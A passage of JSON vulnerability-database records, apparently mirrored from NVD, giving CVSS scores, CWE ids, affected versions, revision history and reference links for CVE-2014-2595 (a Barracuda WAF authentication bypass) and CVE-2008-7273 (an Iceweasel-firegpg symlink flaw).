"exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": 